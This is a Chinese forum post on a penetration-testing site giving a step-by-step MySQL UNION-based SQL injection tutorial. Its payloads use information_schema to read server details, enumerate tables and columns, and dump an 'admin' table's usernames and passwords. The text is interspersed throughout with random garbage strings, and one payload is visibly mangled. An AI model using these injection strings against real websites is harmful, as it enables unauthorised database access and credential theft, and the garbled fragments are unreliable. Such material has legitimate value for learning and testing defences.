中国网络渗透测试联盟

标题: mysql常规注入 [打印本页]

作者: admin    时间: 2012-9-13 17:48
标题: mysql常规注入
本文介绍MYSQL盲注的一些语句和方法
' }  }4 s0 l+ O. [$ ]% D
/ X( X: W* i3 T+ \+ w0 `学习盲注前先了解下 IFORMATION_SCHEMA 库
2 {2 m5 d' u3 j! h& R8 o* w
8 ^3 i, n; l4 y  Y' g6 s- [* ?Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
9 N- h. K! u( M" ~- r* X, w$ W: l! K存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。! V. r2 r" F0 X1 H; r
1.得到所有数据库名:0 R0 U5 b& J! ~6 s' e
|SCHEMATA ->存储数据库名的表" u% z  ~& P) d; h) l
|---字段:SCHEMA_NAME ->数据库名称
  l8 U" N% X* E) m* o# Q$ d
, ^2 u/ L1 o9 Z% a. {|TABLES ->存储表名
* \& v! s9 h4 C' w|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名/ v& B* f: F* _( l( ?0 m
|---字段:TABLE_NAME ->存储表的表名  E# A* w2 Q* Y1 S$ c7 S

3 C0 L% @' P1 b8 C( @  V) t|COLUMNS ->存储的字段名表) M5 N- ~2 E- X4 k' a) [7 m
|---字段:TABLE_SCHEMA ->该字段所属数据库名, t  q4 K6 q' ^9 }& A& n
|---字段:TABLE_NAME ->存储所属表的名称5 c! c. L# Y( ~

+ J1 T$ P  }: {4 B+ t0 V7 r% f|---字段:COLUMN_NAME ->该字段的名称
7 E* H* u5 P8 Q' N
9 z$ F, `' }9 S" S% `5 j8 e
' l; P& a, H4 ]% b; [$ t! R0 x# I& H# d& A2 |
###########################################################################
* x8 K6 I3 P, m4 R2 l/ J, E! [& t; W
0x001 获取系统信息:
  J  j' Y4 M' n0 U; D: I9 h/ d
+ t, z. a. L$ W# X8 Yunion select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
, H" V% P( B4 E5 D
. p4 O; z$ k4 K% j. X, r# O/** ?1 o$ E1 f+ d# v* f; p

1 l" `9 g. c" I7 o7 e8 p/ B@@global.version_compile_os 获取系统版本
7 k% V( E1 ?+ i% H; f! H" L, j7 W7 H8 E: X- j  G" A9 t% K; m
@@datadir 数据库路径) n: g6 @4 ~) q/ s4 x2 h
database() 当前数据库名称' }! e. c- m' E. D' V
0x3c62723e 换行HEX值3 }; S  H8 Y- b
! \& n  H% S6 t, R' @9 y; C
*/- P) i& k) S& A7 ?, q

1 D3 k9 e3 ~- c. m4 u* z # A* j" n( d0 B4 k" i* W- v
# m" I5 Q7 _5 w& R3 w! Y' n
######################################################################/ w- Z% n, q% R" d
; L* c# w# z9 X4 v5 F: n
0x002 获取表名6 U- T8 m" Z0 r& h
$ I. w! W/ r- g6 l. ]+ e. O! m  P, g
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
6 J- E; H0 r( [- h0 U5 e  t, v& ^& `1 t9 F, v6 y5 P1 x, y) E
4 G) x2 f( W5 R  \
8 N( ?, a" @1 |% K! {% Z) N
/*) }+ |4 Z) v) f. j
4 R; Z9 G( t, R1 N' m& P3 T
0x67617264656e 为当前数据库名$ {" @7 R* R! A" U( F7 A( m
; }9 u0 D- a3 t
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名0 z" _2 [, l9 _5 E8 Z* {1 v$ A- l

. n7 ?( y* R$ g2 E  w+ L. a6 v*/" e3 ~+ e5 {; L$ r4 S& u# f  K* y

% W7 n; j( p# n) [######################################################################
# d1 r2 r% ^9 a$ q3 f9 e' E2 R5 o+ m) h7 Y+ d- v4 p7 S
( _+ C- h& v. h' C7 f
" p5 f+ B8 g' r: p- K# a$ C
0x003 获取字段
' K* o( ~( X- q3 T3 e; M# |" d0 G( i. d5 x3 @0 t: U: \" U* o  Q
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
* v  N, k5 \8 [# m* m
- Q3 C& m) g! U7 L4 v5 g/*4 c' g$ z& |5 J. v. b! {5 J1 m4 D
' k/ y- b3 u% C! S" D7 D  B3 I
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段. d0 N* W" t* ]/ }: J. ]

* Y; u3 E! c, N7 P) M0x61646d696e ->选择一个表
. z" p. Q- k! T2 v5 ]
9 p; [+ d1 K1 L4 X1 D: L0x67617264656e ->数据库名
0 ]% W9 |  Y  I  L7 \2 E) y
& ?( R; q0 r5 H- \1 @* E*/
- ?+ Q! T% a- A7 J. H8 U9 r$ E1 p: _7 V  H
#####################################################################$ F. P- C+ f2 U
8 x/ @" ]0 s7 i3 P! v

" h  G* n7 Z4 f6 P% h
. [; m5 ]& }& ^1 F0 y4 d( r0x004 获取数据: E; x0 k0 S4 L1 o; `. v* \  _: C

  i' T9 P4 C) \" z: c. ]union select 1,2,3* t6 Y  D0 V( _6 e& |/ r9 t
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
" l& A, F% I- u: v6 |
: Z1 S+ c+ M2 y# u9 N& A/ nunion select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin2 ]* G: t1 x: o- \# F$ h0 G
) ~& H" ?5 W8 m# s2 u

( o- z. f. w# r; J8 y# }9 B6 F
3 G* F0 V) R+ z! I2 ]! B! `/*& U. a9 r  L* w. W; y+ w% h; U

  }8 r. ?& v; N5 l7 k8 {9 l& a0x3c62723e 换行符号HEX编码
$ R2 }$ |, p" r, y) y/ r! D3 z# L% [6 q& m* x, d
group_concat 同时获得该字段所有数据
2 E; e* |. L, `! c
: p% V! g, ~( W& q*/9 a# a% v6 k0 B: C
3 @+ J. d2 K  X' b5 G4 P





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2